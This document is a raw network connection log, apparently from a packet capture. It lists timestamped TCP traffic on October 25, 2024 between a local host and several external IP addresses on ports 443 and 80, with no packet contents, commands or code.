Oct 25, 2024 21:27:02.695851088 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.736527920 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.736576080 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.736749887 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.736749887 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.736763000 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.736805916 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.817183971 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.817246914 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.817305088 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.817331076 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.817354918 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.817374945 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.857971907 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.858050108 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.858119011 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.858131886 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.858278036 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.858278036 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.939023972 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.939076900 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.939145088 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.939162970 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.939177036 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.939208984 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.979595900 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.979619026 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.979724884 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:02.979737043 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:02.979784966 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.020905018 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.020955086 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.021004915 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.021013021 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.021049023 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.021061897 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.101187944 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.101207018 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.101315022 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.101325035 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.101375103 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.102561951 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.102581978 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.102757931 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.102765083 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.102812052 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.197427988 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.197446108 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.197520971 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.197540045 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.197582006 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.223753929 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.223776102 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.223881006 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.223906994 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.224040985 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.265067101 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.265089989 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.265146017 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.265162945 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.265204906 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.320183039 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.320230961 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.320271969 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.320282936 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.320316076 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.320327997 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.345793962 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.345837116 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.345887899 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.345901012 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.345944881 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.441205025 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.441278934 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.441308022 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.441324949 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.441359043 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.441375017 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.466945887 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.467000008 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.467047930 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.467066050 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.467078924 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.467107058 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.468307972 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.468357086 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.468400002 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.468411922 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.468466043 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.468466043 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.563081980 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.563102961 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.563174009 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.563190937 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.563262939 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.588723898 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.588787079 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.588826895 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.588839054 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.588876009 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.588895082 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.590250969 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.590293884 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.590321064 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.590327978 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.590361118 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.590456963 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.684863091 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.684880972 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.684963942 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.684978962 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.685024023 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.710242987 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.710259914 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.710300922 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.710311890 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.710340977 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.710361004 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.712182045 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.712198973 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.712282896 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.712290049 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.712331057 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.806988001 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.807050943 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.807125092 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.807140112 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.807167053 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.807188988 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.832408905 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.832453966 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.832526922 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.832535028 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.832567930 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.832586050 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.833759069 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.833800077 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.833832026 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.833838940 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.833865881 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.833879948 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.874113083 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.874140978 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.874255896 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.874269009 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.876974106 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.929671049 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.929735899 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.929801941 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.929816008 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.929878950 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.955524921 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.955549002 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.955606937 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.955614090 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.955626965 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.955657959 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.956641912 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.956657887 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.956711054 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:03.956718922 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:03.956926107 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:04.052381992 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.052407980 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.052516937 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:04.052535057 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.052954912 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:04.076704979 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.076745987 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.076881886 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:04.076883078 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:04.076910019 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.077008009 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.077089071 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:04.077095985 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.077146053 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:04.077151060 CEST	443	49730	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:04.080930948 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:04.084629059 CEST	49730	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:05.891531944 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:05.897339106 CEST	80	49731	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:05.897424936 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:05.897675037 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:05.903045893 CEST	80	49731	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:06.531864882 CEST	80	49731	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:06.543610096 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:06.549127102 CEST	80	49731	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:06.690323114 CEST	80	49731	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:06.732146978 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:06.758893967 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:06.758944988 CEST	443	49732	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:06.759032011 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:06.763293028 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:06.763307095 CEST	443	49732	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.384435892 CEST	443	49732	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.384977102 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.392927885 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.392946005 CEST	443	49732	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.393487930 CEST	443	49732	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.450903893 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.530481100 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.575334072 CEST	443	49732	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.671566010 CEST	443	49732	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.671837091 CEST	443	49732	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.671940088 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.676357031 CEST	49732	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.680773973 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:07.686235905 CEST	80	49731	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:07.830569983 CEST	80	49731	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:07.833357096 CEST	49733	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.833399057 CEST	443	49733	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.833488941 CEST	49733	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.833863974 CEST	49733	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:07.833877087 CEST	443	49733	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:07.872746944 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:08.474205017 CEST	443	49733	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:08.477040052 CEST	49733	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:08.477068901 CEST	443	49733	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:08.634341955 CEST	443	49733	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:08.634468079 CEST	443	49733	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:08.634520054 CEST	49733	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:08.635160923 CEST	49733	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:08.670263052 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:08.676054001 CEST	80	49731	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:08.676136971 CEST	49731	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:08.677792072 CEST	49734	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:08.683199883 CEST	80	49734	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:08.683280945 CEST	49734	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:08.683366060 CEST	49734	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:08.688724041 CEST	80	49734	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:09.334266901 CEST	80	49734	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:09.335882902 CEST	49735	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:09.335938931 CEST	443	49735	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:09.336061954 CEST	49735	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:09.336478949 CEST	49735	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:09.336502075 CEST	443	49735	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:09.388391018 CEST	49734	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:09.952052116 CEST	443	49735	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:09.959403038 CEST	49735	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:09.959424973 CEST	443	49735	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:10.108963966 CEST	443	49735	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:10.109246969 CEST	443	49735	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:10.109569073 CEST	49735	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:10.129148960 CEST	49735	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:10.174777031 CEST	49734	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:10.179768085 CEST	49736	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:10.186597109 CEST	80	49736	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:10.186966896 CEST	49736	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:10.187561035 CEST	49736	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:10.194585085 CEST	80	49736	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:10.199275017 CEST	80	49734	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:10.200118065 CEST	49734	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:10.825377941 CEST	80	49736	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:10.830075979 CEST	49737	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:10.830127001 CEST	443	49737	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:10.830456972 CEST	49737	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:10.830809116 CEST	49737	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:10.830832958 CEST	443	49737	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:10.872948885 CEST	49736	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:11.441240072 CEST	443	49737	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:11.443634033 CEST	49737	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:11.443675041 CEST	443	49737	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:11.591090918 CEST	443	49737	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:11.591386080 CEST	443	49737	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:11.591444016 CEST	49737	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:11.592320919 CEST	49737	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:11.596438885 CEST	49736	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:11.597701073 CEST	49738	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:11.604248047 CEST	80	49736	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:11.604844093 CEST	80	49738	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:11.604902029 CEST	49736	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:11.604933977 CEST	49738	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:11.605093002 CEST	49738	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:11.612696886 CEST	80	49738	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:12.237787008 CEST	80	49738	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:12.239077091 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:12.239128113 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:12.239248991 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:12.239455938 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:12.239464998 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:12.279055119 CEST	49738	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:12.854496956 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:12.893137932 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:12.893192053 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:13.046402931 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:13.046567917 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:13.046639919 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:13.047292948 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:13.052522898 CEST	49740	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:13.057925940 CEST	80	49740	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:13.058000088 CEST	49740	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:13.058166027 CEST	49740	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:13.064178944 CEST	80	49740	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:13.710165977 CEST	80	49740	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:13.711745977 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:13.711793900 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:13.711864948 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:13.712197065 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:13.712209940 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:13.763411045 CEST	49740	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:14.356534004 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:14.358886957 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:14.358910084 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:14.512170076 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:14.512432098 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:14.512653112 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:14.513144970 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:14.517395973 CEST	49740	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:14.518913984 CEST	49742	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:14.523370028 CEST	80	49740	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:14.523442030 CEST	49740	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:14.524364948 CEST	80	49742	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:14.524527073 CEST	49742	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:14.524662971 CEST	49742	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:14.530493021 CEST	80	49742	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:15.166908979 CEST	80	49742	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:15.168648958 CEST	49743	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:15.168714046 CEST	443	49743	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:15.168977022 CEST	49743	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:15.169240952 CEST	49743	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:15.169254065 CEST	443	49743	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:15.232268095 CEST	49742	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:15.805099964 CEST	443	49743	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:15.806866884 CEST	49743	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:15.806900978 CEST	443	49743	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:15.956046104 CEST	443	49743	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:15.956299067 CEST	443	49743	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:15.956420898 CEST	49743	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:15.957096100 CEST	49743	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:15.963804007 CEST	49742	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:15.965085983 CEST	49745	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:15.969597101 CEST	80	49742	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:15.969705105 CEST	49742	80	192.168.2.4	158.101.44.242
